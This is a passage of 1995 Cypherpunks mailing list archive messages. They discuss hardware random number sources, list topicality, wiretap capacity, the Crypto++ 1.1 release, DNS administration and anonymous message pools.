iQCUAwUBMJqtkUHx57Ag8goBAQGWRgP1HES4nQiWRx0P31bi94g5MI8pSEwf5CZu
0RlWLyCl5CLB6PKu7bJDqiyHIBBJ90qqvJvZB740QHVxoRKycOD459nMWjiQXcnA
70Aq8gR+ZYCivsJLJfhKxoxuT+s/VyYVMB7mSfqGIGHHErbXHR4oA2T+Owmm8POi
WDr4w3OjyQ==
=3QHQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 11:55:54 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
Message-ID: <acc00caf110210040ee2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:46 PM 11/3/95, Brad Dolan wrote:

>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.
>I think the following is the right phone number.
>
>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>there, while others are spending much money avoiding radon.
>
>Anyway, the pillows make nice sources and good conversation pieces.

I'd say they make poor sources. Far too large. A smaller source has better
access to the detector without adding much to the overall background the
user is exposed to. (I'm not saying low-level uranium or thorium sources
are much of a hazard, but the fluence presented at the detector is very low
for such an extended source.)

It depends on the detector type (alpha, beta, gamma, neutrino?), but high
count rates can be obtained in a variety of ways. (Don't get too high a
count rate, or the dead time characteristics of the pulse-height analyzers
will introduce spurious correlations that decrease entropy--I mention this
to show that even radiation detector sources of entropy have non-random
issues to take into account.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 10:26:40 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <199511040044.TAA00751@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Monta writes:
> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

I didn't contend that its inferior. I contended that its difficult to
distinguish from sources of electronic interference and is easy to get
wrong.

> Take as an example Johnson noise, the voltage noise from a
> resistance.  It's the result of the interaction of vast numbers
> of electrons.  It is unpredictable in the same way that individual
> radioactive decay events are unpredictable, and they are both
> results of friendly quantum mechanics.

However, its very easy to be sure that the event in a radiation
detector was a radioactive decay event. It takes expertise to make
sure that the noise you hear off a noisy circuit isn't just
interference from other parts of the machine feeding back into the
circuit. The reason I like radioactive sources is that they are simple
and unambiguous in this way.

Someone can gimmick a zener diode or get it "wrong" a lot more easily
than they can get a radation event wrong.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 16:02:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <199511040057.TAA00783@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Perry writes:
> > I don't care about quantity. Steve Bellovin is worth 500 subscribers
> > -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> > lot of this stuff than most of what passes for careful thought from
> > the average person here.
> 
> I have some not-so-hypothetical questions: 
> 
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millenium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?
> 
> I do not consider these questions rhetorical, and the answers are very
> important to me on a personal level.

I don't see any problem with a naive person participating. I do see
something wrong with people posting stuff that has nothing whatsoever
to do with the topic of cryptography etc. A discussion of social
security privatization might be interesting, but irrelevant, to name
one example.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Noah Brodbeck <nbrodbeck@hollandhart.com>
Date: Sat, 4 Nov 1995 10:35:04 +0800
To: cypherpunks@toad.com
Subject: Re: Telephone switch capacity -Reply
Message-ID: <s09a7458.054@allegro.net>
MIME-Version: 1.0
Content-Type: text/plain


>>> John D. Ervin <jervin@netpath.net> 11/03/95 05:32pm
>You would be suprised as to how much is being tapped
>now.
>You need to do a little more research before spouting off..

>>If the FBI wishes to set up a system that is capable
>>of monitoring 1% of the total number of lines, that equates
>>to a ability to tap 5%, not 1% of all calls in progress. 

	I am very confused.  I was not 'spouting off' in any
sense of the word.  Your comment refers to my apparent
lack of knowledge of the widespread practice of
wiretapping.  A practice, at least according to the sworn
testimony of agents of the FBI, is not very widespread at all.
	That is, however, beside the point.  I was making a
very truthful comment about the engineered capacity of the
telephone network in the U.S.  I made no comment
whatsoever about the current ability or desire of the FBI to
tap into individuals telephone conversations.

								-=- Noah





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 15:58:51 +0800
To: hallam@w3.org
Subject: [political noise] Re: Crypto & Taxes
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995 hallam@w3.org wrote:

> Why unfortunately? I happen to consider that our modern social ecconomy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and agression by
> other states. All in all rather a good deal.

That wonderful state of bliss seems rather limited in certain parts of 
the world. 

Not that I want to get into a big political discussion, but David Friedman
has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
which argues anarchism/libertarianism from an economist'spoint of view. 
The argument is not cased in terms of ethics and morals but rather 
economic efficiency and utility. Slim, easy to read and cheap. He also 
has a good sense of humor. Unfortunately the book is currently on back order.
I'm holding on to my library copy until they ship one to me.

You can butt heads with him and Tim on the cyberia list (I don't remember 
the address but they have it at news://nntp.hks.net )

I gather from the cyphernomicon that someone recently converted him to 
cryptoanarchy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 12:05:01 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <Pine.3.89.9511032041.C12313-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Peter Monta wrote:

> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

How much do the appropriate Zener diodes (it *is* diodes we're talking 
about, right?) cost? Are these things widely available? (sorry I really don't
remember my electronics lessons)

How would you get your first two sources? (the thermal and avalanche)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 11:57:10 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [political noise] Re: Crypto & Taxes
In-Reply-To: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511040228.VAA00856@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As much as I agree with you, this really doesn't belong in
Cypherpunks. This REALLY isn't a list about libertarian politics.

.pm

s1113645@tesla.cc.uottawa.ca writes:
> 
> 
> On Fri, 3 Nov 1995 hallam@w3.org wrote:
> 
> > Why unfortunately? I happen to consider that our modern social ecconomy
> > is a high point of civilisation. It is certainly a tremendous achievement.
> > We can educate the entire population, provide them with health care,
> > prevent famine and provide protection against crime and agression by
> > other states. All in all rather a good deal.
> 
> That wonderful state of bliss seems rather limited in certain parts of 
> the world. 
> 
> Not that I want to get into a big political discussion, but David Friedman
> has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
> which argues anarchism/libertarianism from an economist'spoint of view. 
> The argument is not cased in terms of ethics and morals but rather 
> economic efficiency and utility. Slim, easy to read and cheap. He also 
> has a good sense of humor. Unfortunately the book is currently on back order.
> I'm holding on to my library copy until they ship one to me.
> 
> You can butt heads with him and Tim on the cyberia list (I don't remember 
> the address but they have it at news://nntp.hks.net )
> 
> I gather from the cyphernomicon that someone recently converted him to 
> cryptoanarchy.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 09:12:18 +0800
To: cypherpunks@toad.com
Subject: Re: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <47e5mc$pec@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511021951.LAA03152@mycroft.rand.org>,
Jim Gillogly <jim@acm.org> wrote:
> 	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one

It'd be faster to use `s/\bnsa\b/NSA/g' for these constructs.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 4 Nov 1995 16:29:32 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <199511040804.AAA03552@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:

> > [ radioactive vs. other ]
>
> I didn't contend that its inferior. I contended that its difficult to
> distinguish from sources of electronic interference and is easy to get
> wrong.

Point taken; it sounds like I misread your post a bit.  Certainly
it's better to have a robust implementation than a delicate one,
but let me argue how hard it might be to get electronic sources
wrong.

> ...
> Someone can gimmick a zener diode or get it "wrong" a lot more easily
> than they can get a radation event wrong.

But how wrong is wrong?  Unless the design is catastrophically bad,
a zener source is going to give you zener noise plus some slight
admixture of interference.  Say the designer is extremely careless
and there's deterministic interference 20 dB down.  I don't see
how even that matters cryptographically---the resulting loss in
entropy will be millibits per sample.

Perhaps there ought to be a couple of standard random-bit-source
implementations, say at the CMOS-standard-cell and board-subsystem
levels, that are widely vetted and trusted (and used!).  But it's
mostly a solved problem, seems to me.

A radioactive source might be okay at the board level (though probably
costlier than its electronic counterpart), but it'd be a pain to
integrate, and it might disturb the rest of the chip.  (I'd like to
have a get_random_bit instruction as part of a microprocessor, for
example.)  Also if you want a high rate of random bits, you need many
decay events, whereas for electronic sources the corresponding
bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

Interestingly enough, zener diodes and particle detectors are a lot
alike.  Zeners, if they're avalanching, already have some internal
gain; each electron crossing the junction gets so hot it knocks
off other electrons, and there's a chain reaction.  Particle detectors
take the ion trail in a suitable environment and make a nice
big pulse out of it with a similar chain-reacton effect (though
the fancier kind will give you the actual amount of charge).

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Sat, 4 Nov 1995 15:02:02 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: RE: Many Topics are Appropriate for Discussion Here
Message-ID: <01BAAA51.0BAA6820@hy34.capecod.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3935.1071713515.multipart/mixed"

--Boundary..3935.1071713515.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Nothing ventured, nothing gained.  I don't mind reading serious
questions no matter how naive, provided that the questioner is
willing to listen to the responses no matter how acerbic.
You would have to have a pretty thick skin to post here frequently.
----------
From: 	Futplex[SMTP:futplex@pseudonym.com]
Sent: 	Friday, November 03, 1995 2:30 PM
To: 	Cypherpunks Mailing List
Subject: 	Re: Many Topics are Appropriate for Discussion Here

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millenium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex@pseudonym.com>



--Boundary..3935.1071713515.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "application/ms-tnef"

eJ8+IhEGAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAENgAQA
AgAAAAIAAgABBJAGACgBAAABAAAADAAAAAMAADADAAAACwAPDgAAAAACAf8P
AQAAAEsAAAAAAAAAgSsfpL6jEBmdbgDdAQ9UAgAAAABDeXBoZXJwdW5rcyBN
YWlsaW5nIExpc3QAU01UUABjeXBoZXJwdW5rc0B0b2FkLmNvbQAAHgACMAEA
AAAFAAAAU01UUAAAAAAeAAMwAQAAABUAAABjeXBoZXJwdW5rc0B0b2FkLmNv
bQAAAAADABUMAQAAAAMA/g8GAAAAHgABMAEAAAAbAAAAJ0N5cGhlcnB1bmtz
IE1haWxpbmcgTGlzdCcAAAIBCzABAAAAGgAAAFNNVFA6Q1lQSEVSUFVOS1NA
VE9BRC5DT00AAAADAAA5AAAAAAsAQDoBAAAAAgH2DwEAAAAEAAAAAAAAA1Y4
AQiABwAYAAAASVBNLk1pY3Jvc29mdCBNYWlsLk5vdGUAMQgBBIABADQAAABS
RTogTWFueSBUb3BpY3MgYXJlIEFwcHJvcHJpYXRlIGZvciBEaXNjdXNzaW9u
IEhlcmUAZhIBBYADAA4AAADLBwsABAABAAEACwAGAPQAASCAAwAOAAAAywcL
AAQAAAA7AAMABgAlAQEJgAEAIQAAADhEOUEzQjdDNDExNkNGMTFBQjIyNDQ0
NTUzNTQwMDAwAOUGAQOQBgDgBQAAEgAAAAsAIwAAAAAAAwAmAAAAAAALACkA
AAAAAAMANgAAAAAAQAA5AIAt3/B6qroBHgBwAAEAAAA0AAAAUkU6IE1hbnkg
VG9waWNzIGFyZSBBcHByb3ByaWF0ZSBmb3IgRGlzY3Vzc2lvbiBIZXJlAAIB
cQABAAAAFgAAAAG6qnrw1nw7mo4WQRHPqyJERVNUAAAAAB4AHgwBAAAABQAA
AFNNVFAAAAAAHgAfDAEAAAASAAAAamJlbGxAY2FwZWNvZC5uZXQAAAADAAYQ
IsJzIwMABxB8AwAAHgAIEAEAAABlAAAATk9USElOR1ZFTlRVUkVELE5PVEhJ
TkdHQUlORURJRE9OVE1JTkRSRUFESU5HU0VSSU9VU1FVRVNUSU9OU05PTUFU
VEVSSE9XTkFJVkUsUFJPVklERURUSEFUVEhFUVVFU1RJTwAAAAACAQkQAQAA
AEwEAABIBAAADQcAAExaRnVNPL7y/wAKAQ8CFQKoBesCgwBQAvIJAgBjaArA
c2V0MjcGAAbDAoMyA8UCAHByQnER4nN0ZW0CgzN3AuQHEwKAfQqACM8J2Tvx
Fg8yNTUCgAqBDbELYOBuZzEwMxRQCwoUUY0L8mMAQAewb3RoC4BoZyB2CfB0
CHAJgCw0IG4bBWcLcQmALiBQIEkgZAIgJwVAbckLgGQgFhBhZBsyEbDrBRAI
YHMKhXEKUBPAHqA3BjEcEB2QYQJABJAgaHpvB+BuC3AbcBvwE1BvfHZpDbAd
0BsQIDAhwWWfH0cgYQQACoUD8GxsGzL+dCAAI9ATwQOgJCEiIhYQfHNwH7EH
kR/8ANAEkGLoaWMuCoVZCGAjkAhgvmwd0BGAG3AkEihDYSExWRHAdHkhwScA
ax5ga/8LgCQSJWATwCCABJAiQANQ5mUfUQIwbHknJgr0I9AIMTgwAtFpLTE0
njQN8AzQLUMLWTE2CqDrA2AT0GMFQC0vZwqHLhvrDDAu5kYDYTowbi7mDIIJ
MfB1dAtQZXhbUyBNVFA6ZjQ0QHAtEbB1HUEGwC4FoG1dfzAPMR0GYAIwMk8z
XAUQZPxheRvwGvAbcAbQIGEZQAEb8DE5OTUgMjpgMzAgUE02XzEdVEZvOJ8z
W0N5cCrRcGh1bmsEIE0LcCPTTMckYTyPN251YmovIT6veTNbUmVEcEFANdA+
cXDPJwAEIArAIkBBcCFBE1CvBzAT0CsQBbFEBABjHsBzAJACICBIKuEKhSvd
M742LecaRS7mHSAoQ3MDcMsiQBwRLUzwLWhAkBsB/xHAJwAHQB9IRHBJjEQA
R6D/KpAiQEyGHoQmoB3BC1EewP5pAmApgB3xJFInACagJVD8aXIgMB+jJCE7
QDYRKPHfA6AKhVHgGxAFsGkpcSohHUzzc0QQJCBHASBvZt4gBQBAkCQgCcBh
QKA6wfUcwHQn4HIp4QWQCHEpcOcb8BHAJxAgKEzyH5BNEb0jNmUjwFWRJMUc
wHgdgkMjwAnwaXVtKRzwQd5tHREEYCrxI9BrWlApgf8kMR4ABKFRgiCQHMAd
kCmA9yoBI8Ae1mIpgADQH5AbcP9SMQqxTiEFIFNRG0FZME4hPyoRG1BeYRzA
KdEIYHQp/1agBcAHgBYQUjEKQFgQGzG/CoUdsQ3AC4BVYF0CPx0A/0ZQHJAL
IDRgBBFWsSIiAHH/WkAFwCTFKTEhcFFCH1Yb8P5zIJAoAQqFIiIkUlYRDdD/
IGFNEV5hHaAEEBPQNXBRc/sg00ghP0mMHSIcAlbQH7HvIYFo01BhH1hyTgFV
QU5BfxvwUYJl2Ec0G3BW8GOGbf8lYAAgAHAiASABIkBJESkRf3AxAiBOUTRg
X9EnJgqFQX9q8iChHSA7QCPQc1EdECd3WmFoIDQwIFAgSEMpEHeXGyA0YHOd
LTQlIDw0/302Aj5Jj0qfS6wKhRUxAAF9wAMAEBAAAAAAAwAREAEAAABAAAcw
wEEdpXqqugFAAAgwwEEdpXqqugEeAD0AAQAAAAUAAABSRTogAAAAABO0
--Boundary..3935.1071713515.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 4 Nov 1995 19:10:26 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Crypto++ 1.1
Message-ID: <Pine.SUN.3.91.951104024506.12530A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am still talking to RSADSI's lawyers, but it's taking a lot longer 
than I expected.  So in the mean time I've decided to rerelease the 
Crypto++ library with RC4, RC5, RSA removed, and some calls to RSAREF 
disabled.  RSADSI said it will not object to this rerelease.  Version 1.1 
also has some minor bug fixes.  You can find it at
 
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
For the next version I hope to work out a deal with RSADSI to put 
some of those files back in.  I'm also planning to add SAFER and 
perhaps some elliptic curve stuff.  Other suggestions 
are welcome.
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.
 
Wei Dai
                                    
P.S. Does anyone know if elliptic curve key agreement protocols are 
patented?  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 5 Nov 1995 07:36:08 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <acc0fd1a0102100488c4@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


I will feed alt.anonymous.messages to ANYONE who asks. I will accept a feed
of that one group from any news server which is used by a remailer.

        -Lance

At 1:13 PM 11/2/95, Futplex wrote:
>Name Withheld by Request writes:
>[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
>> Denial of service attacks could be made somewhat less feasible by
>> making the pool accessible as a mailing list and via http.
>
>Mailing lists of course suffer the problem of strictly limited participation.
>The web approach might work better, in some future with better privacy-
>protecting infrastructure in place. Specifically, if HTTP transactions with
>a popular web server were routinely encrypted, then all reasonably long
>visits to that site would act as cover traffic for a message pool on that
>server. As a bonus, you could have a spiffy form on the web page that
>searches the pool for you.
>
>In any event, the server could log your exploration. This returns us to the
>issue of strongly anonymous web proxies. (And we could imagine
>countermeasures, like daemons that search for randomly selected pseudonym tags
>to muddy the waters. As Tim might say, lots of issues.)
>
>Also, the mention of "as a mailing list _and_ via http" is significant. Making
>the pool available in multiple forms seems to be an unconditional benefit.
>
>-Futplex <futplex@pseudonym.com>

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sun, 5 Nov 1995 04:41:32 +0800
To: cypherpunks@toad.com
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <Pine.LNX.3.91.951104032833.116A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, amp wrote:
 
> greetings c-punks,
> 
> i may have posted this at some time in the past, as i have asked it
> elsewhere and gotten different responses. i'm interested in that the
> folx here think about it though, so here it is...
> 
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.)
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it. i've been playing with the following method. i take a file
> and encrypt it to a key with the '-a' flag on. this generates an
> ascii file that is easily editable using simple, standard rexx calls.
> i strip the first 20 or so lines and the last 20 or so lines
> and put the resulting file aside. then i perform the same operation
> again and append the file to the previous result. i repeat until the
> file is sufficiently large for my purposes and then give the
> resulting file to the person(s) i want to have it.

There is a way to make a file with random contents using PGP.  Just type
pgp +makerandom=xxx file.ext where xxx is the size of the file you want to
create.  I would not advise using this or other methods using a pseudo-
random number generator.
 
> i would think that the output of pgp should be pretty darn random. if
> it isn't, then it's usefulness is less than its reputation imo. as
> you can tell if you've read this far, i'm not a cryptographer. i just
> like the stuff and am working to become more proficient in its use as
> i think it is important if we are to maintain our privacy in an
> increasingly digital world.

The random output of PGP is pretty random but when the output is used to
generate very large OTP's, patterns will no doubt exist.  Hardware RNG's
are still the best. 

`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 5 Nov 1995 19:10:40 +0800
To: cypherpunks@toad.com
Subject: Re: Re[2]: FBI seeks huge wiretapping system
Message-ID: <199511041320.FAA12812@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>It is a well-known fact that it was common practice for NSA operatives to
>                                                        ^^^
>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>                            ^^^^^^
>I think you'll find the NSA was not in existence in the 1800's.

I'm disappointed at the sheer number of similar pieces of email I received
on this. You'da thought the Capn Crunch reference was silly enough that
people would give me a funny look and trash the original message.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 14:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <47eti3$18q@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


(Hopefully someone will correct me if any of this is wrong.  But it
would be nice if the thread ends.)

Here's how it works, politically.  IANA is the ultimate custodian of
the namespace.  IANA has delegated administrative control of the six
traditional top-level domains (TLDs) to the InterNIC.

The InterNIC is a building in my zipcode.  It's in a mundane industrial
park they share with PSI.  It is operated by NSI, which is owned by SAIC,
and funded by an NSF grant and the new domain charges.

Here's how it works, technically.  Your nameserver, if it doesn't
know how to jump into the middle of the tree (via cached data, or the
preconfigured servers for the local domain and the root), will start at
the top of the tree and walk down.

The root nameservers are run by volunteers.  There are nine.  One is
at the InterNIC, but it need not be.  The others are at ISI, PSI, UMD,
NASA, UUNET (ISC), DDN, the Army Research Lab, and NORDUnet (in Sweden).

(The most central point is actually Paul Vixie, maintainer of BIND,
the software used for almost all nameservers, including the roots.
UUNET funds BIND development.)

If the InterNIC yanked your domain, this would *not* affect your IP
connectivity -- your ability to be reached by any Internet protocol via
IP address.  The InterNIC has nothing at all to do with that.

I'm much more worried about a lack of competency at NSI than I am about
the FBI asking them to pull the plug on troublemakers, especially since
it would be taken very seriously if you had a legitimate complaint
about unjust termination (and some people, upset at having to pay for
their domain(s), are looking for any reason to tear into the InterNIC's
reputation).

And *especially* since the evil government types could just call up
Bell Atlantic, who they are already friendly with, and have them make
my line unusable.  That's what I'd do, were I an evil government type.

And if anyone wanted to subvert your domain at a small fraction of the
sites, DNS is easily spoofable....

So keep a sense of perspective.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 4 Nov 1995 21:37:51 +0800
To: cypherpunks@toad.com
Subject: 800_ape
Message-ID: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-5-95. NYPaper Sunday Magazine:

   "Making Microsoft Safe For Capitalism. How do you restrain
   an 800-pound gorilla?" Cover story. By James Gleick.

      If the software giant has its way, it will soon be in a
      position to collect a charge for every airline ticket
      you buy, every credit card purchase you make, every fax
      you send, every picture you download, every Web site you
      visit. It's time to draw the line. But where?

      'Anything not a direct lie or clearly illegal is O.K. to
      do if it advances Microsoft's tribal cause,' Mitchell
      Kapor says. 'This licenses the worst sort of
      manipulations, lies, tortured self-justification and so
      on.'


   800_ape  (Long)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 00:46:26 +0800
To: cypherpunks@toad.com
Subject: Re: e$: 24 Hours
Message-ID: <v02120d00acc10c318f69@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>e$: 24 Hours

I have no idea how this got sent out twice.

However it happened, I apologize.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmckie@ccs.carleton.ca (Craig McKie)
Date: Sat, 4 Nov 1995 22:25:35 +0800
To: cypherpunks@toad.com
Subject: ICE Summary
Message-ID: <9511041401.AA04992@superior>
MIME-Version: 1.0
Content-Type: text/plain


Summary of the the 2nd International Cryptogrpahy Experiment (ICE)
Workshop, Shape Technical Centre, The Hague, Sept.18-19, 1995

http://www.tis.com/crypto/ice/summary.html









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 02:07:32 +0800
Subject: [NOISE] Re: 800_ape
In-Reply-To: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951104095757.6549A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, John Young wrote:

>    11-5-95. NYPaper Sunday Magazine:
> 
>    "Making Microsoft Safe For Capitalism. How do you restrain
>    an 800-pound gorilla?" Cover story. By James Gleick.
> 
>       'Anything not a direct lie or clearly illegal is O.K. to
>       do if it advances Microsoft's tribal cause,' Mitchell
>       Kapor says. 'This licenses the worst sort of
>       manipulations, lies, tortured self-justification and so
>       on.'

Mitch is incorrect. Microsoft considers direct lies to be OK. Witness the 
handling of the SMB security bugs.

I'm putting together a "Windows 95 Frequently Unanswered Questions File."

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:41:51 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <acc0dca515021004eb09@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:04 AM 11/4/95, Peter Monta wrote:

>Perhaps there ought to be a couple of standard random-bit-source
>implementations, say at the CMOS-standard-cell and board-subsystem
>levels, that are widely vetted and trusted (and used!).  But it's
>mostly a solved problem, seems to me.

This is something John Gilmore called for when he wrote:

At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known.  But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.
>
>Currently, random number generators are chips or larger circuits.
>Nobody will pay to put these on a motherboard.  But if a random number
>generating circuit occupied 1/1000th of a CPU chip or "multi-function
